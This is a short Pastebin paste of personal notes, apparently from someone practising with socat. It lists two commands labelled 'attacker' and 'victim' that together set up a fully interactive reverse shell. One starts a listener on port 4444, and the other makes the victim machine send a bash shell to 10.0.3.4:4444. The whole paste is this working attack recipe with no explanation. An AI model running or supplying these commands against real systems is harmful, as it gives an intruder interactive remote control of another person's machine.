Advertisement
mathio3

rani ghir n5ala6 socat -_-

Jun 30th, 2019
162
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.19 KB | None | 0 0
  1.  
  2. Iam here ---> /tmp/tmp/socat
  3.  
  4. On attacker (listen):
  5. socat file:`tty`,raw,echo=0 tcp-listen:4444
  6.  
  7. On Victim (launch):
  8. socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement